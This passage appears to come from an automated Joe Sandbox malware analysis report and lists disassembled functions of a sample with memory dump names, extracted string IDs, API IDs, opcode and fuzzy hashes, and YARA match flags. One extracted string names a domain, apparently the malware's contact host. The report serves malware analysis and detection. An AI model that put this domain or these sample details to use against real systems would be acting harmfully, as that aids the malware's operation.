                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                                                          • String ID: _$uHHs$Wu
                                                                                                                                                                                                                                                          • API String ID: 3664257935-106544228
                                                                                                                                                                                                                                                          • Opcode ID: 5da1a61b1ac2646240e8ef51aa07ea68389517e308048d9ed602d276010136ed
                                                                                                                                                                                                                                                          • Instruction ID: 657a4d5abfb12f1dc895d1f067591f20c39952d2f974751b242cefe10b9506bf
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5da1a61b1ac2646240e8ef51aa07ea68389517e308048d9ed602d276010136ed
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 24D1D3606187E08AD7358F3994A07BBBBD1AFA7304F5849AED4C98B382C7394505CB57
                                                                                                                                                                                                                                                          Function 0041CA70 Relevance: 6.9, Strings: 5, Instructions: 626COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: +$4l/n$HI$AC$EG
                                                                                                                                                                                                                                                          • API String ID: 0-2131502145
                                                                                                                                                                                                                                                          • Opcode ID: 2326dbb95e7f5883c8c84f8d81630c06661b5b13304fd181672047a9092814e8
                                                                                                                                                                                                                                                          • Instruction ID: a4ec15649f5ce789aa249a628662369405bf800bf02bbfe84a00a1b55f3e5535
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2326dbb95e7f5883c8c84f8d81630c06661b5b13304fd181672047a9092814e8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B21233B650C3509BC704DF65CC926ABBBE2EF82314F08886DF4C58B391E7399945CB96
                                                                                                                                                                                                                                                          Function 0248140D Relevance: 6.8, Strings: 5, Instructions: 541COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: '$.$`$m$x
                                                                                                                                                                                                                                                          • API String ID: 0-658611574
                                                                                                                                                                                                                                                          • Opcode ID: d64924eb30d76bfc61f9959272d5f030006163cc45ba092eb88482dec6fd7146
                                                                                                                                                                                                                                                          • Instruction ID: 6eb46bdc5475f176efbae29d38fa23e6adf793bd6e09a4fb574dbdc7b8e19eec
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d64924eb30d76bfc61f9959272d5f030006163cc45ba092eb88482dec6fd7146
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0522A27291C7908BC725AF3884943AEBBD2ABD5324F194A2FD4ED97391D7748842CB43
                                                                                                                                                                                                                                                          Function 004111A6 Relevance: 6.8, Strings: 5, Instructions: 541COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: '$.$`$m$x
                                                                                                                                                                                                                                                          • API String ID: 0-658611574
                                                                                                                                                                                                                                                          • Opcode ID: fd5b69244993d46e929284a9bdd3bf796c8df4c9b55dffd7aefbb48e1f1effbb
                                                                                                                                                                                                                                                          • Instruction ID: 2144aee67b07277a24bb181582e3d7a2e9ec39ed2a6ddb42bc05191b79a9b14a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fd5b69244993d46e929284a9bdd3bf796c8df4c9b55dffd7aefbb48e1f1effbb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1522F67250C7908BC7249F3884913EFBBE1ABD5324F194A2FE5E9973E1D67888418B47
                                                                                                                                                                                                                                                          Function 024793B7 Relevance: 6.7, Strings: 5, Instructions: 441COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: $869$2841$<5%"$LG$yx
                                                                                                                                                                                                                                                          • API String ID: 0-1687199681
                                                                                                                                                                                                                                                          • Opcode ID: 81a90c5b949388645e4c4577b2877a3cec77f85482f17fa4fd1f021cc46f1452
                                                                                                                                                                                                                                                          • Instruction ID: fdae4bce21484dd1b6c407482ff4757a8edc59c43d23349bf47ad78913a11a78
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 81a90c5b949388645e4c4577b2877a3cec77f85482f17fa4fd1f021cc46f1452
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46C1277260C3D14FD7158F29C4507ABBFE2ABD2244F198A6EE4E59B382C779C406C762
                                                                                                                                                                                                                                                          Function 00409150 Relevance: 6.7, Strings: 5, Instructions: 441COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: $869$2841$<5%"$LG$yx
                                                                                                                                                                                                                                                          • API String ID: 0-1687199681
                                                                                                                                                                                                                                                          • Opcode ID: 81a90c5b949388645e4c4577b2877a3cec77f85482f17fa4fd1f021cc46f1452
                                                                                                                                                                                                                                                          • Instruction ID: 6e29797cb701a68307395225b6e7be505ceeebb86d1407f7b9dd9bd878f88501
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 81a90c5b949388645e4c4577b2877a3cec77f85482f17fa4fd1f021cc46f1452
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 82C1247260C3914BD7158E29C4503ABBFE2ABD6204F18897EE8D59B3C3C67DC806C766
                                                                                                                                                                                                                                                          Function 00426A30 Relevance: 6.7, Strings: 5, Instructions: 423COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: $XZ$6t2v$k$TV$\^
                                                                                                                                                                                                                                                          • API String ID: 0-467934898
                                                                                                                                                                                                                                                          • Opcode ID: 935442da50ba2d5043c65627e36db0efaeaf6c014d5b582d321cc1546aeed32b
                                                                                                                                                                                                                                                          • Instruction ID: b605e89531a81705ebfe3af5fac37aee9194eb61735b639e3b3a85eadae14b77
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 935442da50ba2d5043c65627e36db0efaeaf6c014d5b582d321cc1546aeed32b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5E1F0B5608340DFE7209F14EC81B6FB7E0FB8A304F55892DE6C59B2A1DB359815CB4A
                                                                                                                                                                                                                                                          Function 0247AB27 Relevance: 6.6, Strings: 5, Instructions: 384COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: $>$$>$/ $@G$xA
                                                                                                                                                                                                                                                          • API String ID: 0-3945432221
                                                                                                                                                                                                                                                          • Opcode ID: 90c64e1f23e03181c965945bf2a84877bb968eb59494c716de8320de25829884
                                                                                                                                                                                                                                                          • Instruction ID: d1d71060264184f7625529bc4b08e4a5382685551db11cbf1944df1e46eb587a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 90c64e1f23e03181c965945bf2a84877bb968eb59494c716de8320de25829884
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97B1F8B564C3608BC324CF1884906EFBBE2DFC2609F48096DE8E55B351C776894ACB83
                                                                                                                                                                                                                                                          Function 00409600 Relevance: 6.6, Strings: 5, Instructions: 348COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: "7-0$,-$0$57DB89578F850E8625E054D164A37606$XO
                                                                                                                                                                                                                                                          • API String ID: 0-885611589
                                                                                                                                                                                                                                                          • Opcode ID: 96ffc6abc21e90aa4f60c2ac5e4c014c751766b9a0af1ae67335a06f1a6e3ed3
                                                                                                                                                                                                                                                          • Instruction ID: b14e87bd0a1771ab9c69b1f7aba9e5e6c348a9572cac4b455d4e49c452734ab2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 96ffc6abc21e90aa4f60c2ac5e4c014c751766b9a0af1ae67335a06f1a6e3ed3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4FB1E5B16083409BD718DF25D8519AFBBE6EBC2314F14892DE0D69B382D738D50ACB5A
                                                                                                                                                                                                                                                          Function 02479157 Relevance: 6.5, Strings: 5, Instructions: 251COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: +$40$c$xs$+
                                                                                                                                                                                                                                                          • API String ID: 0-1069988977
                                                                                                                                                                                                                                                          • Opcode ID: 0213a91b2d80012fb1b31493f043b6b78dca9e3c88a933d5aecf2aab1307a7db
                                                                                                                                                                                                                                                          • Instruction ID: beaaa4a5f68616f31ba7676442d39b1421c2318bb2bde7ceff6a36d813682f76
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0213a91b2d80012fb1b31493f043b6b78dca9e3c88a933d5aecf2aab1307a7db
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C861043154D3C28AD3119F7984D07ABFFE0AFA7254F18456EE8E04B382D37A850AD766
                                                                                                                                                                                                                                                          Function 00408EF0 Relevance: 6.5, Strings: 5, Instructions: 251COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: +$40$c$xs$+
                                                                                                                                                                                                                                                          • API String ID: 0-1069988977
                                                                                                                                                                                                                                                          • Opcode ID: 0213a91b2d80012fb1b31493f043b6b78dca9e3c88a933d5aecf2aab1307a7db
                                                                                                                                                                                                                                                          • Instruction ID: 337f816b89ebe18a5921aad55b72e827079c057bc6ea50a272954d896ed24b54
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0213a91b2d80012fb1b31493f043b6b78dca9e3c88a933d5aecf2aab1307a7db
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D461F22154D3D28AE3019F79949036BFFE0AFA3350F18456EE8D41B382D77A890AD766
                                                                                                                                                                                                                                                          Function 0248E9F7 Relevance: 5.9, Strings: 4, Instructions: 901COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: "=$5$&[da$'%.W$\X
                                                                                                                                                                                                                                                          • API String ID: 0-3996675343
                                                                                                                                                                                                                                                          • Opcode ID: 3b4b3338808811478b25342cb31a8a8ddb2f31bec34827d1a2cf89aded2df0b7
                                                                                                                                                                                                                                                          • Instruction ID: b2db28a04d33f4deade6fb315abc92128a44a32aa9af0cc96827e4d4876d841a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b4b3338808811478b25342cb31a8a8ddb2f31bec34827d1a2cf89aded2df0b7
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F62497190C3918FC321DF29C89066FBFE1AF95214F19876EE8E54B792D7318909CB92
                                                                                                                                                                                                                                                          Function 0249DDE6 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 498COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                                                          • String ID: _$uHHs
                                                                                                                                                                                                                                                          • API String ID: 3664257935-2879388440
                                                                                                                                                                                                                                                          • Opcode ID: 4e91dc025a6f01339c4642c8171ef5ad3519262cb00870dcedb663402979482b
                                                                                                                                                                                                                                                          • Instruction ID: 25205facd5b5c1f1c06fef362e3c006c72b04f90462c37e5498cfb5a456e2fd9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e91dc025a6f01339c4642c8171ef5ad3519262cb00870dcedb663402979482b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74D1A3706183D08ADB35CB3584A17BBBFE1AF97209F0849AED4C98B782D7394505CB53
                                                                                                                                                                                                                                                          Function 004339F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: MetricsSystem
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                                          • Opcode ID: e1c78a85c073594b75890c03197e051504a5e28f3cbe51423f7dbecb5aa6b388
                                                                                                                                                                                                                                                          • Instruction ID: 9919e99d947470de0ad43a1edc8932ab1666953d7c59876c21ae7e6382b5c0c6
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1c78a85c073594b75890c03197e051504a5e28f3cbe51423f7dbecb5aa6b388
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 735161B4E152189FDB40EFACD98569DBBF0BB88300F114529E498E7360D734AD84CF96
                                                                                                                                                                                                                                                          Function 02479867 Relevance: 5.3, Strings: 4, Instructions: 348COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: "7-0$,-$0$XO
                                                                                                                                                                                                                                                          • API String ID: 0-3383152870
                                                                                                                                                                                                                                                          • Opcode ID: 7e112ea5793d11c79ed244ae7d7952959776df1f25fc16c3ee4f57ebed7bce44
                                                                                                                                                                                                                                                          • Instruction ID: 782b4fd97bae478f74a1867c8a644a08a8a3b62e38e2bc01f29641098b9758b7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e112ea5793d11c79ed244ae7d7952959776df1f25fc16c3ee4f57ebed7bce44
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4DB1D8B12083809BD718DF259855AAFBBE6EFC2314F14896DE0E68B381D739C509CB16
                                                                                                                                                                                                                                                          Function 0247E16B Relevance: 5.3, Strings: 4, Instructions: 339COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: 255B$8A23$C566$E5E1
                                                                                                                                                                                                                                                          • API String ID: 0-3367982953
                                                                                                                                                                                                                                                          • Opcode ID: f0eae71c9d6d3c7835d1a474653f2e65b944a28a3ad533d021ed57ddccbba122
                                                                                                                                                                                                                                                          • Instruction ID: bca8cd79a4aa6442c91b48111e7ffcc9cc5938a4bcbc4301a89260964893c1f0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f0eae71c9d6d3c7835d1a474653f2e65b944a28a3ad533d021ed57ddccbba122
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FAA10C616593924BE3348B258C91BEFB7D1EBD2214F088B7DC4E897792F33844029792
                                                                                                                                                                                                                                                          Function 0040DF04 Relevance: 5.3, Strings: 4, Instructions: 339COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: 255B$8A23$C566$E5E1
                                                                                                                                                                                                                                                          • API String ID: 0-3367982953
                                                                                                                                                                                                                                                          • Opcode ID: f0eae71c9d6d3c7835d1a474653f2e65b944a28a3ad533d021ed57ddccbba122
                                                                                                                                                                                                                                                          • Instruction ID: c9ab22a39130a17e05ee61a651d87010c03896c5afd99520b9bc1921e18da37f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f0eae71c9d6d3c7835d1a474653f2e65b944a28a3ad533d021ed57ddccbba122
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03A12B316593924BD3348B258C91BEBBBE1EBD2314F088A7DD4D897792F73848069792
                                                                                                                                                                                                                                                          Function 0248D08A Relevance: 5.3, Strings: 4, Instructions: 338COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: 4l/n$HI$AC$EG
                                                                                                                                                                                                                                                          • API String ID: 0-4032564853
                                                                                                                                                                                                                                                          • Opcode ID: c7ee6880a574bd16a93718f20b38e443ce83357569437b4de60bae4c0ef18ea8
                                                                                                                                                                                                                                                          • Instruction ID: ec981e25fdb38ed29b7cf948df3251a17e20e061734d81aaf48734619a7b4014
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7ee6880a574bd16a93718f20b38e443ce83357569437b4de60bae4c0ef18ea8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9891EF75A183508BCB18EF29CC927BBB7E1EF85314F08996DE8958B3D1E7389504C752
                                                                                                                                                                                                                                                          Function 0042822E Relevance: 5.3, Strings: 4, Instructions: 270COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: XY$AC$IK$MO
                                                                                                                                                                                                                                                          • API String ID: 0-664538580
                                                                                                                                                                                                                                                          • Opcode ID: 0b73aad8a95d2f06891519b54b1f3653af007b234c1babc73ac4eaa6f42c3391
                                                                                                                                                                                                                                                          • Instruction ID: 39428194e500b5a53c6aae23f15327502ea0c60e828c0b8a3651ea1546d1f37d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0b73aad8a95d2f06891519b54b1f3653af007b234c1babc73ac4eaa6f42c3391
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A8124B6A09310DFD7109F25E84172FB7E1ABC5304F154A3EE98597381EB38E9058B8B
                                                                                                                                                                                                                                                          Function 0247D387 Relevance: 4.8, APIs: 1, Strings: 2, Instructions: 312COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Uninitialize
                                                                                                                                                                                                                                                          • String ID: D$lev-tolstoi.com
                                                                                                                                                                                                                                                          • API String ID: 3861434553-4021809485
                                                                                                                                                                                                                                                          • Opcode ID: c6607468542c65a9894b4d5e932ac42de7adf9d9df50bf63ac7d2a47c1c64f60
                                                                                                                                                                                                                                                          • Instruction ID: b7591ffd02cfd363ba7f996fd032be5b5e8c88783f6f784d22aa68a678f95a7e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c6607468542c65a9894b4d5e932ac42de7adf9d9df50bf63ac7d2a47c1c64f60
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1DA1EEB55193D28BD335CF2584A0BEBBBE1AFD6304F08896DC0EA4B351D7754506CB92
                                                                                                                                                                                                                                                          Function 0040D120 Relevance: 4.8, APIs: 1, Strings: 2, Instructions: 312COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
